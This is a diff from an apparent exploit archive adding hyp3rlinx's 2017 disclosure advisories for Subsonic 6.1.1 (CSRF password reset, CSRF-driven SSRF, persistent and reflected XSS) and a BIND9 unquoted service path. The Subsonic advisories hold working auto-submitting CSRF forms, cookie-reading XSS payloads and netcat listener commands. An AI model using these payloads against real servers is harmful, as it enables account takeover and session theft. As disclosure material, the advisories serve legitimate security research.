Pragma: no-cache
|
||||||
|
User-Agent: Java/1.8.0_45
|
||||||
|
Host: 127.0.0.1:1337
|
||||||
|
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
|
||||||
|
Connection: keep-alive
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Network Access:
|
||||||
|
===============
|
||||||
|
Remote
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Severity:
|
||||||
|
=========
|
||||||
|
High
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Disclosure Timeline:
|
||||||
|
==================================
|
||||||
|
Vendor Notification: May 29, 2017
|
||||||
|
Vendor Acknowledgement: May 30, 2017
|
||||||
|
June 4, 2017 : Public Disclosure
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
[+] Disclaimer
|
||||||
|
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||||
|
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||||
|
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||||
|
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||||
|
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||||
|
or exploits by the author or elsewhere. All content (c).
|
||||||
|
|
||||||
|
hyp3rlinx
|
90
platforms/windows/local/42121.txt
Executable file
90
platforms/windows/local/42121.txt
Executable file
|
@ -0,0 +1,90 @@
|
||||||
|
[+] Credits: John Page aka hyp3rlinx
|
||||||
|
[+] Website: hyp3rlinx.altervista.org
|
||||||
|
[+] Source: http://hyp3rlinx.altervista.org/advisories/BIND9-PRIVILEGE-ESCALATION.txt
|
||||||
|
[+] ISR: ApparitionSec
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Vendor:
|
||||||
|
===========
|
||||||
|
www.isc.org
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Product:
|
||||||
|
===========
|
||||||
|
BIND9
|
||||||
|
v9.10.5 x86 / x64
|
||||||
|
|
||||||
|
|
||||||
|
BIND is open source software that enables you to publish your Domain Name System (DNS) information on the Internet, and to resolve DNS
|
||||||
|
queries for your users. The name BIND stands for “Berkeley Internet Name Domain”, because the software originated in the early 1980s
|
||||||
|
at the University of California at Berkeley.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Type:
|
||||||
|
===================
|
||||||
|
Privilege Escalation
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
CVE Reference:
|
||||||
|
==============
|
||||||
|
CVE-2017-3141
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Security Issue:
|
||||||
|
================
|
||||||
|
BIND installs as a service with an unquoted service path, to exploit a local attacker must place
|
||||||
|
a malicious executable file named "Program.exe" in the path of the service, if the process runs under
|
||||||
|
some account other than the attackers it can be used to exec code under a different set of privileges.
|
||||||
|
|
||||||
|
|
||||||
|
C:\>sc qc named
|
||||||
|
[SC] QueryServiceConfig SUCCESS
|
||||||
|
|
||||||
|
SERVICE_NAME: named
|
||||||
|
TYPE : 10 WIN32_OWN_PROCESS
|
||||||
|
START_TYPE : 2 AUTO_START
|
||||||
|
ERROR_CONTROL : 1 NORMAL
|
||||||
|
BINARY_PATH_NAME : C:\Program Files\ISC BIND 9\bin\named.exe
|
||||||
|
LOAD_ORDER_GROUP :
|
||||||
|
TAG : 0
|
||||||
|
DISPLAY_NAME : ISC BIND
|
||||||
|
DEPENDENCIES :
|
||||||
|
SERVICE_START_NAME : .\named
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Network Access:
|
||||||
|
===============
|
||||||
|
Local
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Severity:
|
||||||
|
=========
|
||||||
|
Medium
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Disclosure Timeline:
|
||||||
|
==================================
|
||||||
|
Vendor Notification: May 13, 2017
|
||||||
|
Vendor confirm: May 14, 2017
|
||||||
|
June 4, 2017 : Public Disclosure
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
[+] Disclaimer
|
||||||
|
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||||
|
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||||
|
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||||
|
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||||
|
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||||
|
or exploits by the author or elsewhere. All content (c).
|
86
platforms/windows/webapps/42117.txt
Executable file
86
platforms/windows/webapps/42117.txt
Executable file
|
@ -0,0 +1,86 @@
|
||||||
|
[+] Credits: John Page a.k.a hyp3rlinx
|
||||||
|
[+] Website: hyp3rlinx.altervista.org
|
||||||
|
[+] Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-PASSWORD-RESET-CSRF.txt
|
||||||
|
[+] ISR: ApparitionSec
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Vendor:
|
||||||
|
================
|
||||||
|
www.subsonic.org
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Product:
|
||||||
|
===============
|
||||||
|
subsonic v6.1.1
|
||||||
|
|
||||||
|
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Type:
|
||||||
|
=====================
|
||||||
|
CSRF - Password Reset
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
CVE Reference:
|
||||||
|
==============
|
||||||
|
CVE-2017-9415
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Security Issue:
|
||||||
|
================
|
||||||
|
Remote attackers can reset subsonic user account passwords if an authenticated user clicks a malicious link
|
||||||
|
or visits an attacker controlled webpage. However, username must be known or guessed.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Exploit/POC:
|
||||||
|
=============
|
||||||
|
<form action="http://localhost:4040/userSettings.view" method="POST">
|
||||||
|
<input type="hidden" name="username" value="admin">
|
||||||
|
<input type="hidden" name="transcodeSchemeName" value="OFF">
|
||||||
|
<input name="passwordChange" type="hidden" value="true"/>
|
||||||
|
<input type="hidden" name="_passwordChange" value="on"/>
|
||||||
|
<input name="password" type="hidden" value="xyz123"/>
|
||||||
|
<input name="confirmPassword" type="hidden" value="xyz123"/>
|
||||||
|
<input name="email" type="hidden" value=""/>
|
||||||
|
<script>document.forms[0].submit()</script>
|
||||||
|
</form>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Network Access:
|
||||||
|
===============
|
||||||
|
Remote
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Severity:
|
||||||
|
=========
|
||||||
|
High
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Disclosure Timeline:
|
||||||
|
=============================
|
||||||
|
Vendor Notification: May 29, 2017
|
||||||
|
Vendor Acknowledgement: May 30, 2017
|
||||||
|
June 4, 2017 : Public Disclosure
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
[+] Disclaimer
|
||||||
|
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||||
|
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||||
|
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||||
|
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||||
|
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||||
|
or exploits by the author or elsewhere. All content (c).
|
||||||
|
|
||||||
|
hyp3rlinx
|
117
platforms/windows/webapps/42118.txt
Executable file
117
platforms/windows/webapps/42118.txt
Executable file
|
@ -0,0 +1,117 @@
|
||||||
|
[+] Credits: John Page a.k.a hyp3rlinx
|
||||||
|
[+] Website: hyp3rlinx.altervista.org
|
||||||
|
[+] Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-CSRF-SERVER-SIDE-REQUEST-FORGERY.txt
|
||||||
|
[+] ISR: ApparitionSec
|
||||||
|
|
||||||
|
|
||||||
|
Vendor:
|
||||||
|
================
|
||||||
|
www.subsonic.org
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Product:
|
||||||
|
===============
|
||||||
|
subsonic v6.1.1
|
||||||
|
|
||||||
|
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Type:
|
||||||
|
==================================
|
||||||
|
CSRF - Server Side Request Forgery
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
CVE Reference:
|
||||||
|
==============
|
||||||
|
CVE-2017-9413
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Security Issue:
|
||||||
|
================
|
||||||
|
Remote attackers can abuse the Podcast feature of subsonic to launch Server Side Request Forgery attacks on the internal network
|
||||||
|
or to the internet if an authenticated user clicks a malicious link or visits an attacker controlled webpage. SSRF can be used to
|
||||||
|
bypass Firewall restriction on LAN.
|
||||||
|
|
||||||
|
e.g
|
||||||
|
|
||||||
|
nc.exe -llvp 1337
|
||||||
|
listening on [any] 1337 ...
|
||||||
|
|
||||||
|
connect to [127.0.0.1] from USER-PC [127.0.0.1] 64428
|
||||||
|
GET / HTTP/1.1
|
||||||
|
Cache-Control: no-cache
|
||||||
|
Pragma: no-cache
|
||||||
|
User-Agent: Java/1.8.0_45
|
||||||
|
Host: 127.0.0.1:1337
|
||||||
|
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
|
||||||
|
Connection: keep-alive
|
||||||
|
|
||||||
|
|
||||||
|
Exploit/POC:
|
||||||
|
=============
|
||||||
|
nc.exe -llvp 1337
|
||||||
|
listening on [any] 1337 ...
|
||||||
|
|
||||||
|
|
||||||
|
1) Subscribe to Podcast CSRF Persistent SSRF
|
||||||
|
|
||||||
|
<form method="post" action="http://localhost:4040/podcastReceiverAdmin.view?">
|
||||||
|
<input type="text" name="add" value="http://127.0.0.1:1337">
|
||||||
|
<input type="submit" value="OK">
|
||||||
|
<script>document.forms[0].submit()</script>
|
||||||
|
</form>
|
||||||
|
|
||||||
|
|
||||||
|
nc.exe -llvp 5555
|
||||||
|
listening on [any] 5555 ...
|
||||||
|
|
||||||
|
|
||||||
|
2) Interet Radio Settings CSRF Persistent SSRF
|
||||||
|
|
||||||
|
<form action="http://localhost:4040/networkSettings.view" method="post">
|
||||||
|
<input name="portForwardingEnabled" type="hidden" value="true"/>
|
||||||
|
<input type="hidden" name="_portForwardingEnabled" value="on"/>
|
||||||
|
<input name="urlRedirectionEnabled" type="hidden" value="true" />
|
||||||
|
<input type="hidden" name="_urlRedirectionEnabled" value="on"/>
|
||||||
|
<input name="urlRedirectType" type="radio" value="NORMAL"/>
|
||||||
|
<input name="urlRedirectFrom" type="radio" value="yourname"/>
|
||||||
|
<input name="urlRedirectType" type="radio" value="CUSTOM" checked="true" />
|
||||||
|
<input name="urlRedirectCustomUrl" type="hidden" value="http://127.0.0.1:5555"/>
|
||||||
|
<script>document.forms[0].submit()</script>
|
||||||
|
</form>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Network Access:
|
||||||
|
===============
|
||||||
|
Remote
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Severity:
|
||||||
|
=========
|
||||||
|
High
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Disclosure Timeline:
|
||||||
|
==================================
|
||||||
|
Vendor Notification: May 29, 2017
|
||||||
|
Vendor Acknowledgement: May 30, 2017
|
||||||
|
June 4, 2017 : Public Disclosure
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
[+] Disclaimer
|
||||||
|
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||||
|
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||||
|
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||||
|
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||||
|
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||||
|
or exploits by the author or elsewhere. All content (c).
|
||||||
|
|
||||||
|
hyp3rlinx
|
96
platforms/windows/webapps/42120.txt
Executable file
96
platforms/windows/webapps/42120.txt
Executable file
|
@ -0,0 +1,96 @@
|
||||||
|
[+] Credits: John Page a.k.a hyp3rlinx
|
||||||
|
[+] Website: hyp3rlinx.altervista.org
|
||||||
|
[+] Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-CSRF-PERSISTENT-XSS.txt
|
||||||
|
[+] ISR: ApparitionSec
|
||||||
|
|
||||||
|
|
||||||
|
Vendor:
|
||||||
|
================
|
||||||
|
www.subsonic.org
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Product:
|
||||||
|
===============
|
||||||
|
subsonic v6.1.1
|
||||||
|
|
||||||
|
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Type:
|
||||||
|
======================
|
||||||
|
CSRF - Persistent XSS
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
CVE Reference:
|
||||||
|
==============
|
||||||
|
CVE-2017-9414
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Security Issue:
|
||||||
|
================
|
||||||
|
Remote attackers can abuse the Subscribe to Podcast feature of subsonic to store persistent XSS payloads
|
||||||
|
if an authenticated user clicks a malicious link or visits an attacker controlled webpage.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Exploit/POC:
|
||||||
|
=============
|
||||||
|
<form action="http://localhost:4040/playerSettings.view" method="post">
|
||||||
|
<input name="playerId" type="hidden" value="1">
|
||||||
|
<input name="name" type="text" value="<script>alert('XSS ' +document.cookie)</script>">
|
||||||
|
<script>document.forms[0].submit()</script>
|
||||||
|
</form>
|
||||||
|
|
||||||
|
Then visit http://localhost:4040/index.view
|
||||||
|
|
||||||
|
HTTP Response:
|
||||||
|
XSS JSESSIONID=1n631ex230ljs; player-61646d696e=1; DWRSESSIONID=!hqFsK!BCyup7gBQU8spRLvw0tBacefl9Nl
|
||||||
|
|
||||||
|
|
||||||
|
Misc Reflected:
|
||||||
|
|
||||||
|
XSS 1
|
||||||
|
http://localhost:4040/avatar.view?id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
|
||||||
|
|
||||||
|
XSS 2
|
||||||
|
http://localhost:4040//userChart.view?type=%3Cscript%3Ealert(document.cookie)%3C/script%3E
|
||||||
|
|
||||||
|
XSS 3
|
||||||
|
http://localhost:4040/coverArt.view?size=%3Cscript%3Ealert(123)%3C/script%3E
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Network Access:
|
||||||
|
===============
|
||||||
|
Remote
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Severity:
|
||||||
|
=========
|
||||||
|
High
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Disclosure Timeline:
|
||||||
|
==================================
|
||||||
|
Vendor Notification: May 29, 2017
|
||||||
|
Vendor Acknowledgement: May 30, 2017
|
||||||
|
June 4, 2017 : Public Disclosure
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
[+] Disclaimer
|
||||||
|
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||||
|
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||||
|
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||||
|
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||||
|
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||||
|
or exploits by the author or elsewhere. All content (c).
|
||||||
|
|
||||||
|
hyp3rlinx
|
Loading…
Add table
Reference in a new issue